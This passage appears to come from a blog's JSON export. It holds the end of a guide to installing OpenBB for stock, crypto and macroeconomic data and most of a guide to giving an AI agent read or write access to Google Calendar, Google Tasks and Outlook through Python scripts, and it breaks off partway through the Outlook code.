When using commercial financial data APIs (like TwelveData), you often encounter these issues:\nRate limits: Daily caps on API calls (e.g., 800/day) Limited data coverage: No support for crypto or macroeconomic data Cost concerns: Paid upgrades required for high-frequency usage Vendor lock-in: Data formats and API designs tied to specific providers OpenBB is an open-source financial data platform that provides a \u0026ldquo;connect once, consume everywhere\u0026rdquo; solution.\nCore Advantages of OpenBB Feature OpenBB Commercial API (TwelveData) Cost Free \u0026amp; Open Source Limited free tier Data Sources Multi-source aggregation (yfinance, FRED, etc.) Single source Cryptocurrency ✅ Supported ❌ Not supported Macroeconomics ✅ Supported (OECD, FRED) ❌ Not supported Technical Indicators ✅ Built-in calculation Manual calculation Vendor Lock-in ❌ None ✅ Strong dependency Environment Setup This guide is based on the following environment:\nComponent Version/Details OpenClaw 2026.3.2 OS Debian 13 (Linux 6.12.63) Python 3.13+ Network Stable internet access required Installing OpenBB Step 1: Create Virtual Environment Debian systems need the python3-venv package:\n# Install venv module (requires sudo) sudo apt install python3.13-venv # Create virtual environment python3 -m venv ~/.openclaw/openbb-env Step 2: Install OpenBB # Activate virtual environment source ~/.openclaw/openbb-env/bin/activate # Upgrade pip pip install --upgrade pip # Install OpenBB with all extensions pip install \u0026#34;openbb[all]\u0026#34; Installation time: ~3-5 minutes (depends on network speed)\nVerification:\npython3 -c \u0026#34;from openbb import obb; print(\u0026#39;✅ OpenBB installed successfully\u0026#39;)\u0026#34; Configuring Data Sources No API Key Required (Out-of-the-box) Source Use Case Limitations yfinance Stocks, Crypto Free, rate limits apply OECD Macroeconomic data Delayed data IMF Global economic data Incomplete data World Bank Development data Delayed data API Key Required 
(Optional) Source Use Case Free Tier Registration FRED US macroeconomic data Free fred.stlouisfed.org Alpha Vantage Real-time stock data 25 calls/day alphavantage.co Finnhub Stocks, News 60 calls/minute finnhub.io Configure API Keys After obtaining API keys, edit the virtual environment activation script:\nvim ~/.openclaw/openbb-env/bin/activate Add at the end:\n# OpenBB API Keys export FRED_API_KEY=\u0026#34;your_fred_key_here\u0026#34; export AV_API_KEY=\u0026#34;your_alpha_vantage_key_here\u0026#34; Basic Usage Examples Fetch Stock Data #!/usr/bin/env python3 import sys sys.path.insert(0, \u0026#39;/path/to/your/openbb-env/lib/python3.13/site-packages\u0026#39;) from openbb import obb # Get Apple stock historical data output = obb.equity.price.historical(\u0026#39;AAPL\u0026#39;, provider=\u0026#39;yfinance\u0026#39;, limit=30) df = output.to_dataframe() # View latest data latest = df.iloc[-1] print(f\u0026#34;Current Price: ${latest[\u0026#39;close\u0026#39;]:.2f}\u0026#34;) print(f\u0026#34;Volume: {int(latest[\u0026#39;volume\u0026#39;]):,}\u0026#34;) Fetch Cryptocurrency Data from openbb import obb # Get Bitcoin data output = obb.crypto.price.historical(\u0026#39;BTC-USD\u0026#39;, provider=\u0026#39;yfinance\u0026#39;, limit=30) df = output.to_dataframe() latest = df.iloc[-1] print(f\u0026#34;BTC Current Price: ${latest[\u0026#39;close\u0026#39;]:,.2f}\u0026#34;) Fetch Macroeconomic Data (OECD Countries) from openbb import obb # Get UK GDP try: output = obb.economy.gdp(country=\u0026#39;united_kingdom\u0026#39;, provider=\u0026#39;oecd\u0026#39;) df = output.to_dataframe() print(df.tail(5)) except Exception as e: print(f\u0026#34;GDP data fetch failed: {e}\u0026#34;) # Get unemployment rate try: output = obb.economy.unemployment(country=\u0026#39;united_kingdom\u0026#39;) df = output.to_dataframe() print(df.tail(5)) except Exception as e: print(f\u0026#34;Unemployment data fetch failed: {e}\u0026#34;) Building a Stock Analysis Script Create a complete stock 
analysis script for daily briefings:\n#!/usr/bin/env python3 \u0026#34;\u0026#34;\u0026#34;OpenBB Stock Analysis Script - Replacement for TwelveData\u0026#34;\u0026#34;\u0026#34; import sys sys.path.insert(0, \u0026#39;/path/to/your/openbb-env/lib/python3.13/site-packages\u0026#39;) import os from datetime import datetime, timedelta from openbb import obb # Stock list STOCKS = [\u0026#39;MSFT\u0026#39;, \u0026#39;AAPL\u0026#39;, \u0026#39;GOOGL\u0026#39;] def calculate_rsi(prices, period=14): \u0026#34;\u0026#34;\u0026#34;Calculate RSI indicator\u0026#34;\u0026#34;\u0026#34; if len(prices) \u0026lt; period + 1: return 50 deltas = [prices[i] - prices[i-1] for i in range(1, len(prices))] gains = [d if d \u0026gt; 0 else 0 for d in deltas[-period:]] losses = [-d if d \u0026lt; 0 else 0 for d in deltas[-period:]] avg_gain = sum(gains) / period avg_loss = sum(losses) / period if avg_loss == 0: return 100 rs = avg_gain / avg_loss rsi = 100 - (100 / (1 + rs)) return rsi def calculate_ma(prices, period): \u0026#34;\u0026#34;\u0026#34;Calculate Moving Average\u0026#34;\u0026#34;\u0026#34; if len(prices) \u0026lt; period: return prices[-1] return sum(prices[-period:]) / period def get_stock_analysis(symbol): \u0026#34;\u0026#34;\u0026#34;Get complete stock analysis\u0026#34;\u0026#34;\u0026#34; try: # Get 30 days of historical data output = obb.equity.price.historical(symbol, provider=\u0026#39;yfinance\u0026#39;, limit=35) df = output.to_dataframe() if df.empty: return None # Latest data latest = df.iloc[-1] prev = df.iloc[-2] # Price data current = latest[\u0026#39;close\u0026#39;] change = current - prev[\u0026#39;close\u0026#39;] change_pct = (change / prev[\u0026#39;close\u0026#39;]) * 100 volume = int(latest[\u0026#39;volume\u0026#39;]) # 30-day statistics high_30 = df[\u0026#39;high\u0026#39;].max() low_30 = df[\u0026#39;low\u0026#39;].min() prices = df[\u0026#39;close\u0026#39;].tolist() # Technical indicators rsi = calculate_rsi(prices) ma20 = calculate_ma(prices, 
20) # Trend judgment if current \u0026gt; ma20: trend = \u0026#34;📈 Uptrend\u0026#34; elif current \u0026lt; ma20: trend = \u0026#34;📉 Downtrend\u0026#34; else: trend = \u0026#34;➡️ Sideways\u0026#34; # RSI signal if rsi \u0026gt; 70: rsi_signal = \u0026#34;⚠️ Overbought\u0026#34; elif rsi \u0026lt; 30: rsi_signal = \u0026#34;💡 Oversold\u0026#34; else: rsi_signal = \u0026#34;📊 Normal\u0026#34; # 52-week position (estimated from 30-day data) week52_position = ((current - low_30) / (high_30 - low_30)) * 100 if high_30 != low_30 else 50 return { \u0026#39;symbol\u0026#39;: symbol, \u0026#39;current\u0026#39;: current, \u0026#39;change\u0026#39;: change, \u0026#39;change_pct\u0026#39;: change_pct, \u0026#39;volume\u0026#39;: volume, \u0026#39;high_30\u0026#39;: high_30, \u0026#39;low_30\u0026#39;: low_30, \u0026#39;rsi\u0026#39;: rsi, \u0026#39;rsi_signal\u0026#39;: rsi_signal, \u0026#39;ma20\u0026#39;: ma20, \u0026#39;trend\u0026#39;: trend, \u0026#39;week52_position\u0026#39;: week52_position } except Exception as e: print(f\u0026#34;❌ {symbol} error: {str(e)[:50]}\u0026#34;, file=sys.stderr) return None def main(): \u0026#34;\u0026#34;\u0026#34;Main function\u0026#34;\u0026#34;\u0026#34; # Fill in the report date and weekday (the placeholders were previously left unformatted) now = datetime.now() print(f\u0026#34;📊 **Stock Technical Analysis Report** - {now.strftime(\u0026#39;%Y-%m-%d\u0026#39;)} ({now.strftime(\u0026#39;%A\u0026#39;)})\u0026#34;) for symbol in STOCKS: data = get_stock_analysis(symbol) if data: # Format output emoji = \u0026#34;🟢\u0026#34; if data[\u0026#39;change\u0026#39;] \u0026gt;= 0 else \u0026#34;🔴\u0026#34; print(f\u0026#34;{emoji} **{data[\u0026#39;symbol\u0026#39;]}**\u0026#34;) print(f\u0026#34; Current: ${data[\u0026#39;current\u0026#39;]:.2f} ({data[\u0026#39;change\u0026#39;]:+.2f}, {data[\u0026#39;change_pct\u0026#39;]:+.2f}%)\u0026#34;) print(f\u0026#34; Volume: {data[\u0026#39;volume\u0026#39;]:,}\u0026#34;) print(f\u0026#34; Trend: {data[\u0026#39;trend\u0026#39;]}\u0026#34;) print(f\u0026#34; RSI(14): {data[\u0026#39;rsi\u0026#39;]:.1f} {data[\u0026#39;rsi_signal\u0026#39;]}\u0026#34;) print(f\u0026#34; MA20:
${data[\u0026#39;ma20\u0026#39;]:.2f}\u0026#34;) print(f\u0026#34; 30-Day Range: ${data[\u0026#39;low_30\u0026#39;]:.2f} - ${data[\u0026#39;high_30\u0026#39;]:.2f}\u0026#34;) print(f\u0026#34; Range Position: {data[\u0026#39;week52_position\u0026#39;]:.1f}%\u0026#34;) print() print(\u0026#34;💡 Data Source: OpenBB (yfinance)\u0026#34;) print(\u0026#34;⚠️ For reference only, not investment advice\u0026#34;) if __name__ == \u0026#39;__main__\u0026#39;: main() Integration with AI Agents Update Scheduled Tasks Edit your AI agent\u0026rsquo;s cron configuration to use the OpenBB script:\n{ \u0026#34;id\u0026#34;: \u0026#34;your-job-id-here\u0026#34;, \u0026#34;name\u0026#34;: \u0026#34;Daily Stock Analysis - 8:30 AM\u0026#34;, \u0026#34;enabled\u0026#34;: true, \u0026#34;schedule\u0026#34;: { \u0026#34;kind\u0026#34;: \u0026#34;cron\u0026#34;, \u0026#34;expr\u0026#34;: \u0026#34;0 30 8 * * 1-5\u0026#34;, \u0026#34;tz\u0026#34;: \u0026#34;Asia/Shanghai\u0026#34; }, \u0026#34;payload\u0026#34;: { \u0026#34;kind\u0026#34;: \u0026#34;agentTurn\u0026#34;, \u0026#34;message\u0026#34;: \u0026#34;Execute script: python3 ~/.openclaw/workspace/openbb_stock_analysis.py. Send the script output as your reply without any additional explanation.\u0026#34; }, \u0026#34;delivery\u0026#34;: { \u0026#34;mode\u0026#34;: \u0026#34;announce\u0026#34;, \u0026#34;to\u0026#34;: \u0026#34;discord:YOUR_CHANNEL_ID\u0026#34; } } Data Comparison: OpenBB vs Commercial APIs Stock Data Comparison Metric OpenBB (yfinance) TwelveData Real-time 15-min delayed 15-min delayed Data Fields OHLCV OHLCV Technical Indicators Manual calculation Partially provided Free Tier Unlimited 800 calls/day Stability Good Good Extended Data Dimensions OpenBB Additional Support:\n✅ Cryptocurrency (BTC, ETH, etc.) ✅ Macroeconomic data (OECD countries) ✅ Fundamental data (with API configuration) ✅ Multi-source aggregation Commercial API Advantages:\n✅ Direct technical indicators (RSI, MACD, etc.) 
✅ WebSocket real-time data (paid) ✅ More user-friendly API design Other Use Cases for OpenBB Beyond AI agent integration, OpenBB is suitable for:\n1. Quantitative Trading Strategy Development Backtesting: Test strategies using historical data Real-time signals: Generate trading signals based on technical indicators Portfolio optimization: Calculate optimal asset allocation 2. Academic Research \u0026amp; Data Analysis Economic papers: Empirical analysis with macroeconomic data Financial research: Stock return distributions, volatility analysis Data science: Training data for machine learning models 3. Personal Finance \u0026amp; Investment Tracking Portfolio monitoring: Track holdings in real-time Asset allocation analysis: Stock/bond ratios, sector distribution Risk assessment: VaR, maximum drawdown calculations 4. Corporate Financial Analysis Competitor analysis: Financial data of listed companies Industry research: Industry trends, market share analysis Risk monitoring: Supply chain risks, currency risks 5. Education \u0026amp; Training Finance courses: Free data sources for students Programming education: Hands-on Python financial data analysis Case studies: Real market data examples 6. News \u0026amp; Content Creation Financial media: Data-backed viewpoints Market commentary: Analysis reports based on data Data journalism: Visualizing market trends FAQ Q1: Why do some data sources require API Keys? A: High-quality sources (like FRED, Alpha Vantage) require registration for API keys, but usually have free tiers. This is to control access frequency and track usage.\nQ2: Can OpenBB get real-time data? A: yfinance provides delayed data (typically 15-20 minutes). For real-time data, you need to configure paid sources (like Polygon.io, Tradier).\nQ3: How to extend data sources? A: OpenBB supports plugin extensions. 
Install additional data source packages via pip:\npip install openbb-fred # FRED data source pip install openbb-polygon # Polygon.io data source Summary OpenBB is a powerful open-source financial data platform, especially suitable for:\n✅ High-frequency usage: Unlimited free tier ✅ Cryptocurrency: Native support ✅ Macroeconomics: OECD, FRED, and other sources ✅ Self-hosting: Data autonomy and control ✅ AI Integration: MCP Server support Reference Resources OpenBB Official Documentation OpenBB GitHub yfinance Documentation FRED API Registration Choose the solution that fits your needs and build an autonomous, controllable financial data infrastructure.\n","permalink":"https://www.d5n.xyz/en/posts/openbb-deployment-guide/","summary":"\u003ch2 id=\"why-openbb\"\u003eWhy OpenBB?\u003c/h2\u003e\n\u003cp\u003eWhen using commercial financial data APIs (like TwelveData), you often encounter these issues:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eRate limits\u003c/strong\u003e: Daily caps on API calls (e.g., 800/day)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLimited data coverage\u003c/strong\u003e: No support for crypto or macroeconomic data\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCost concerns\u003c/strong\u003e: Paid upgrades required for high-frequency usage\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eVendor lock-in\u003c/strong\u003e: Data formats and API designs tied to specific providers\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eOpenBB\u003c/strong\u003e is an open-source financial data platform that provides a \u0026ldquo;connect once, consume everywhere\u0026rdquo; solution.\u003c/p\u003e\n\u003ch3 id=\"core-advantages-of-openbb\"\u003eCore Advantages of OpenBB\u003c/h3\u003e\n\u003ctable\u003e\n  \u003cthead\u003e\n      \u003ctr\u003e\n          \u003cth\u003eFeature\u003c/th\u003e\n          \u003cth\u003eOpenBB\u003c/th\u003e\n          \u003cth\u003eCommercial API (TwelveData)\u003c/th\u003e\n      
\u003c/tr\u003e\n  \u003c/thead\u003e\n  \u003ctbody\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003eCost\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003eFree \u0026amp; Open Source\u003c/td\u003e\n          \u003ctd\u003eLimited free tier\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003eData Sources\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003eMulti-source aggregation (yfinance, FRED, etc.)\u003c/td\u003e\n          \u003ctd\u003eSingle source\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003eCryptocurrency\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003e✅ Supported\u003c/td\u003e\n          \u003ctd\u003e❌ Not supported\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003eMacroeconomics\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003e✅ Supported (OECD, FRED)\u003c/td\u003e\n          \u003ctd\u003e❌ Not supported\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003eTechnical Indicators\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003e✅ Built-in calculation\u003c/td\u003e\n          \u003ctd\u003eManual calculation\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003eVendor Lock-in\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003e❌ None\u003c/td\u003e\n          \u003ctd\u003e✅ Strong dependency\u003c/td\u003e\n      \u003c/tr\u003e\n  \u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"environment-setup\"\u003eEnvironment Setup\u003c/h2\u003e\n\u003cp\u003eThis guide is based on the following environment:\u003c/p\u003e","title":"Building an Open-Source Financial Data Platform with OpenBB: A Complete Guide to Replacing Commercial APIs"},{"content":"Why Do AI Agents Need Schedule Management? 
When you ask your AI agent \u0026ldquo;What\u0026rsquo;s on my schedule today?\u0026rdquo; or \u0026ldquo;Create a meeting for tomorrow at 3 PM,\u0026rdquo; it should execute accurately, not say \u0026ldquo;I don\u0026rsquo;t know.\u0026rdquo;\nA complete AI agent schedule system should have:\n📅 Read schedules - Know what\u0026rsquo;s happening today and tomorrow ⏰ Timely reminders - Push notifications at the right time 📝 Task tracking - Manage to-do items and completion status 🤖 Proactive creation - AI can create new events and tasks for you 🔄 Multi-device sync - Accessible from phone, computer, and AI assistant But choosing the right solution isn\u0026rsquo;t easy—network environment, configuration complexity, and usage habits all affect the decision.\nSolution Overview Solution China Stability Setup Difficulty AI Can Create Best For Google Calendar ⭐⭐ (needs VPN) ⭐⭐⭐ Complex ✅ Yes Overseas users, full Google ecosystem Microsoft Outlook ⭐⭐⭐⭐⭐ Excellent ⭐⭐ Medium ✅ Yes Enterprise users, Microsoft ecosystem Notion ⭐⭐⭐⭐ Good ⭐ Simple ✅ Yes Knowledge workers, flexible databases Local Markdown ⭐⭐⭐⭐⭐ Perfect ⭐ Minimal ✅ Yes Privacy-first, quick start Solution 1: Google Calendar Who It\u0026rsquo;s For Already have Google account and calendar data Network environment can stably access Google Need AI assistant that can both read AND create events and tasks Key Advantages Complete ecosystem - Calendar + Tasks dual functionality, AI can read and write Mature API - Python official library support with comprehensive debugging docs Fine-grained permissions - Control AI to have read-only or full control Generous free tier - Almost unlimited for personal use Main Drawbacks Difficult China access - Needs stable VPN/proxy Relatively complex setup - Involves two authentication methods working together Permission pitfalls - IAM roles, API scopes, and calendar sharing permissions can be confusing Our Configuration Approach Based on real deployment experience, we use a hybrid 
authentication approach:\nFeature Auth Method Reason Calendar Service Account Calendars can be shared with Service Account, suitable for automated access Tasks OAuth Google Tasks cannot be shared like calendars, must use OAuth to access personal task list 💡 Lesson learned: We initially tried to use Service Account for both calendar and tasks, but discovered Tasks API doesn\u0026rsquo;t support Service Account access to personal task lists. We ended up with a hybrid solution: Service Account for calendar, OAuth for tasks.\nStep 1: Create Google Cloud Project Visit Google Cloud Console Click project selector → New Project Project name: ai-schedule-demo Click Create Step 2: Enable APIs Enable two APIs:\nSearch \u0026ldquo;Google Calendar API\u0026rdquo; → Click Enable Search \u0026ldquo;Tasks API\u0026rdquo; → Click Enable Step 3: Configure Calendar Access (Service Account) Service Account is suitable for calendar access because calendars can be explicitly shared with it.\n3.1 Create Service Account Google Cloud Console → IAM \u0026amp; Admin → Service Accounts Click Create Service Account Name: calendar-reader Click Create and Continue Role selection: If AI only needs to read calendar → Viewer If AI needs to create/edit events → Editor Click Done 📌 Permission note: The IAM role selected here controls the Service Account\u0026rsquo;s access to Google Cloud resources. 
If you need AI to create events later, choose the Editor role.\n3.2 Create Key Click the Service Account you just created → Keys tab Add Key → Create new key → JSON Download and save as service-account.json Move to config directory: mkdir -p ~/.config/google-calendar cp ~/Downloads/service-account.json ~/.config/google-calendar/ chmod 600 ~/.config/google-calendar/service-account.json 3.3 Share Calendar with Service Account Critical step: the Service Account cannot automatically access your calendar; you must explicitly share it.\nOpen Google Calendar In the left sidebar, find the calendar to sync → Click ⋮ → Settings and sharing Share with specific people → Add people Enter Service Account email (like calendar-reader@ai-schedule-demo.iam.gserviceaccount.com) Permission selection: See all event details - AI can only read Make changes to events - AI can create and edit events ⚠️ Common error: If you forget to share the calendar, or set permission to \u0026ldquo;See only free/busy,\u0026rdquo; the API returns empty list or 403 error.\n3.4 Python Code - Read Calendar Create google_calendar.py:\n#!/usr/bin/env python3 \u0026#34;\u0026#34;\u0026#34;Google Calendar Reader - Service Account Method\u0026#34;\u0026#34;\u0026#34; import os from datetime import datetime, timedelta from google.oauth2 import service_account from googleapiclient.discovery import build # Service Account config SCOPES = [\u0026#39;https://www.googleapis.com/auth/calendar.readonly\u0026#39;] SERVICE_ACCOUNT_FILE = os.path.expanduser(\u0026#39;~/.config/google-calendar/service-account.json\u0026#39;) # Use the ID of the calendar you shared (your Gmail address for the default calendar). # For a Service Account, \u0026#39;primary\u0026#39; would resolve to the Service Account\u0026#39;s own empty calendar, not yours. CALENDAR_ID = \u0026#39;your.email@gmail.com\u0026#39; def get_today_events(): \u0026#34;\u0026#34;\u0026#34;Get today\u0026#39;s events\u0026#34;\u0026#34;\u0026#34; if not os.path.exists(SERVICE_ACCOUNT_FILE): return \u0026#34; ⚠️ Service Account not configured\u0026#34; try: creds = service_account.Credentials.from_service_account_file( SERVICE_ACCOUNT_FILE, scopes=SCOPES) service = 
build(\u0026#39;calendar\u0026#39;, \u0026#39;v3\u0026#39;, credentials=creds) # Today\u0026#39;s time range now = datetime.now() start = now.replace(hour=0, minute=0, second=0).isoformat() + \u0026#39;+08:00\u0026#39; end = (now + timedelta(days=1)).replace(hour=0, minute=0, second=0).isoformat() + \u0026#39;+08:00\u0026#39; events_result = service.events().list( calendarId=CALENDAR_ID, timeMin=start, timeMax=end, singleEvents=True, orderBy=\u0026#39;startTime\u0026#39; ).execute() events = events_result.get(\u0026#39;items\u0026#39;, []) if not events: return \u0026#34; • No events today\u0026#34; lines = [] for event in events: start = event[\u0026#39;start\u0026#39;].get(\u0026#39;dateTime\u0026#39;, event[\u0026#39;start\u0026#39;].get(\u0026#39;date\u0026#39;)) if \u0026#39;T\u0026#39; in start: time_str = start[11:16] else: time_str = \u0026#39;All day\u0026#39; lines.append(f\u0026#34; • {time_str} {event[\u0026#39;summary\u0026#39;]}\u0026#34;) return \u0026#39;\\n\u0026#39;.join(lines) except Exception as e: return f\u0026#34; ⚠️ Failed: {str(e)[:50]}\u0026#34; if __name__ == \u0026#39;__main__\u0026#39;: print(\u0026#34;📅 **Today\u0026#39;s Schedule**\u0026#34;) print(get_today_events()) Step 4: Configure Task Access (OAuth) Google Tasks cannot be shared like calendars; you must use OAuth to access your personal task list.\n4.1 Configure OAuth Consent Screen Left menu → APIs \u0026amp; Services → OAuth consent screen User type: External (for personal accounts) App name: AI Schedule User support email: Select your Gmail Developer contact info: Enter your email Click Save and Continue 4.2 Add API Scopes Add Tasks permissions (choose based on needs):\nRead-only:\nhttps://www.googleapis.com/auth/tasks.readonly - Read tasks Full permissions (AI can create/complete tasks):\nhttps://www.googleapis.com/auth/tasks - Full task control Setup steps:\nAdd or remove scopes → Add the URL above Click Update → Save and Continue Test users → Add users → Enter your Gmail 
address Click Save and Continue → Back to dashboard 📌 Permission note: With the above configuration, AI can only read tasks. If you need AI to create tasks later, use the tasks full permission and re-authorize.\n4.3 Create OAuth Client ID Credentials → Create credentials → OAuth client ID Application type: Desktop app Name: OpenClaw Desktop Click Create Download JSON file, rename to client_secret.json Move to config directory: cp ~/Downloads/client_secret.json ~/.config/google-calendar/ chmod 600 ~/.config/google-calendar/client_secret.json 4.4 Python Code - Read Tasks Create google_tasks.py:\n#!/usr/bin/env python3 \u0026#34;\u0026#34;\u0026#34;Google Tasks Reader - OAuth Method\u0026#34;\u0026#34;\u0026#34; import os import pickle from datetime import datetime from google_auth_oauthlib.flow import InstalledAppFlow from google.auth.transport.requests import Request from googleapiclient.discovery import build # OAuth config SCOPES = [\u0026#39;https://www.googleapis.com/auth/tasks.readonly\u0026#39;] CLIENT_SECRET_FILE = os.path.expanduser(\u0026#39;~/.config/google-calendar/client_secret.json\u0026#39;) TOKEN_FILE = os.path.expanduser(\u0026#39;~/.config/google-calendar/token.json\u0026#39;) def get_credentials(): \u0026#34;\u0026#34;\u0026#34;Get OAuth credentials, first run requires browser authorization\u0026#34;\u0026#34;\u0026#34; creds = None if os.path.exists(TOKEN_FILE): with open(TOKEN_FILE, \u0026#39;rb\u0026#39;) as token: creds = pickle.load(token) if not creds or not creds.valid: if creds and creds.expired and creds.refresh_token: creds.refresh(Request()) else: if not os.path.exists(CLIENT_SECRET_FILE): print(\u0026#34;❌ client_secret.json not found\u0026#34;) return None flow = InstalledAppFlow.from_client_secrets_file( CLIENT_SECRET_FILE, SCOPES) # For headless environments, use manual authorization auth_url, _ = flow.authorization_url(prompt=\u0026#39;consent\u0026#39;) print(f\u0026#34;Please visit this URL to authorize:\\n{auth_url}\\n\u0026#34;) 
code = input(\u0026#34;Enter authorization code: \u0026#34;) flow.fetch_token(code=code) creds = flow.credentials # Save token os.makedirs(os.path.dirname(TOKEN_FILE), exist_ok=True) with open(TOKEN_FILE, \u0026#39;wb\u0026#39;) as token: pickle.dump(creds, token) return creds def get_tasks(): \u0026#34;\u0026#34;\u0026#34;Get to-do tasks\u0026#34;\u0026#34;\u0026#34; try: creds = get_credentials() if not creds: return \u0026#34; ⚠️ Not authorized\u0026#34; service = build(\u0026#39;tasks\u0026#39;, \u0026#39;v1\u0026#39;, credentials=creds) result = service.tasks().list( tasklist=\u0026#39;@default\u0026#39;, showCompleted=False, maxResults=10 ).execute() tasks = result.get(\u0026#39;items\u0026#39;, []) if not tasks: return \u0026#34; • No tasks\u0026#34; lines = [] today = datetime.now().strftime(\u0026#39;%Y-%m-%d\u0026#39;) for task in tasks: title = task.get(\u0026#39;title\u0026#39;, \u0026#39;Untitled\u0026#39;) due = task.get(\u0026#39;due\u0026#39;, \u0026#39;\u0026#39;) if due: due_date = due[:10] if due_date \u0026lt; today: prefix = \u0026#34; ⚠️ Overdue: \u0026#34; elif due_date == today: prefix = \u0026#34; 📌 Today: \u0026#34; else: prefix = \u0026#34; • \u0026#34; else: prefix = \u0026#34; • \u0026#34; lines.append(f\u0026#34;{prefix}{title}\u0026#34;) return \u0026#39;\\n\u0026#39;.join(lines) except Exception as e: return f\u0026#34; ⚠️ Failed: {str(e)[:40]}\u0026#34; if __name__ == \u0026#39;__main__\u0026#39;: print(\u0026#34;📋 **To-Do Tasks**\u0026#34;) print(get_tasks()) First run requires authorization:\npip3 install --user google-auth-oauthlib google-api-python-client python3 google_tasks.py # Will show authorization URL, open in browser, copy code and paste Step 5: Integrate into Daily Brief Integrate in rss_news.py:\ndef get_schedule_section(): \u0026#34;\u0026#34;\u0026#34;Get schedule section\u0026#34;\u0026#34;\u0026#34; # Calendar uses Service Account from google_calendar import get_today_events # Tasks uses OAuth from google_tasks 
import get_tasks lines = [] lines.append(\u0026#34;📅 **Today\u0026#39;s Schedule**\u0026#34;) lines.append(get_today_events()) lines.append(\u0026#34;\u0026#34;) lines.append(\u0026#34;📋 **To-Do Tasks**\u0026#34;) lines.append(get_tasks()) return \u0026#39;\\n\u0026#39;.join(lines) Permission Upgrade: Let AI Create Events and Tasks With the above configuration, AI can only read events and tasks. If you need AI to create events or tasks, upgrade permissions:\nUpgrade Calendar Permissions (Service Account) 1. Modify IAM Role\nGoogle Cloud Console → IAM \u0026amp; Admin → IAM Find Service Account → Click Edit Change role to: Editor Click Save 2. Ensure Calendar Sharing Permission is Correct\nGoogle Calendar → Calendar settings Service Account permission must be \u0026ldquo;Make changes to events\u0026rdquo; 3. Update Code Scope\n# From readonly to full permission SCOPES = [\u0026#39;https://www.googleapis.com/auth/calendar\u0026#39;] Upgrade Task Permissions (OAuth) 1. Modify Google Cloud Scopes\nAPIs \u0026amp; Services → OAuth consent screen → Edit app Add or remove scopes, change tasks.readonly to tasks Click Update → Save 2. Update Code Permissions\nSCOPES = [\u0026#39;https://www.googleapis.com/auth/tasks\u0026#39;] # Remove .readonly 3. Re-authorize\nrm ~/.config/google-calendar/token.json python3 google_tasks.py # Revisit authorization URL, get new authorization code 💡 Real experience: I started with read-only permissions. When I wanted AI to create tasks, I discovered I needed: (1) Correct Google Cloud scopes + (2) Correct code scope + (3) Re-authorization. 
After deleting token and re-authorizing, AI could create events for me.\nSolution 2: Microsoft Outlook / 365 Who It\u0026rsquo;s For Use Outlook email or Office 365 Enterprise/school provides Microsoft account Need stable China access Key Advantages Excellent China stability - Microsoft has CDN in China Enterprise integration - Deep integration with Teams, Outlook Personal free tier - Outlook.com accounts work Main Drawbacks Slightly complex setup - Requires Azure AD app registration Permission approval - Some permissions need admin consent Setup from Scratch Step 1: Register Azure AD App Visit Azure Portal Search Azure Active Directory → App registrations → New registration Fill in: Name: ai-schedule-outlook Supported account types: Accounts in any organizational directory + personal Microsoft accounts Click Register Step 2: Configure Authentication Click Manage → Authentication → Add a platform Select Mobile and desktop applications Check https://login.microsoftonline.com/common/oauth2/nativeclient Click Configure Step 3: Get Application Credentials Copy Application (client) ID Left side Certificates \u0026amp; secrets → New client secret Description: schedule-access Expires: 24 months Click Add, immediately copy the secret value (shown only once!) 
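The Application ID and client secret you just copied will eventually live in `~/.config/outlook/config.py` (Step 5). A blank or missing value there fails with an opaque MSAL error, so an offline sanity check is worth doing first. The sketch below is illustrative (the `load_outlook_config` helper is not part of MSAL or this guide); it imports the config file by path and fails fast on any missing key:

```python
#!/usr/bin/env python3
"""Sanity-check an Outlook config.py before making any Graph calls."""
import importlib.util

REQUIRED = ("CLIENT_ID", "CLIENT_SECRET", "TENANT_ID")

def load_outlook_config(path):
    """Import a config.py by file path; raise if any credential is missing or blank."""
    spec = importlib.util.spec_from_file_location("outlook_config", path)
    cfg = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(cfg)
    missing = [k for k in REQUIRED if not str(getattr(cfg, k, "")).strip()]
    if missing:
        raise ValueError(f"{path} is missing values for: {', '.join(missing)}")
    return {k: getattr(cfg, k) for k in REQUIRED}
```

Running it against your real config file before Step 6 turns a confusing 401 later into an immediate, named error now.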
Step 4: Add API Permissions API permissions → Add a permission → Microsoft Graph Delegated permissions → Search and add: Calendars.Read Tasks.Read Click Grant admin consent (organizational tenants only; personal accounts consent on first sign-in) Step 5: Place Credentials Create config file ~/.config/outlook/config.py:\nCLIENT_ID = \u0026#39;your-application-id\u0026#39; CLIENT_SECRET = \u0026#39;your-client-secret\u0026#39; TENANT_ID = \u0026#39;common\u0026#39; # For personal accounts Step 6: Python Code # Install dependencies pip3 install --user msal requests Create get_outlook_schedule.py:\n#!/usr/bin/env python3 \u0026#34;\u0026#34;\u0026#34;Microsoft Outlook/365 Schedule Retrieval\u0026#34;\u0026#34;\u0026#34; import os import sys from datetime import datetime, timedelta sys.path.insert(0, os.path.expanduser(\u0026#39;~/.config/outlook\u0026#39;)) try: import msal import requests except ImportError: print(\u0026#34;Please install: pip3 install --user msal requests\u0026#34;) sys.exit(1) try: from config import CLIENT_ID, CLIENT_SECRET, TENANT_ID # CLIENT_SECRET is unused by the device code flow below except ImportError: print(\u0026#34;Please create 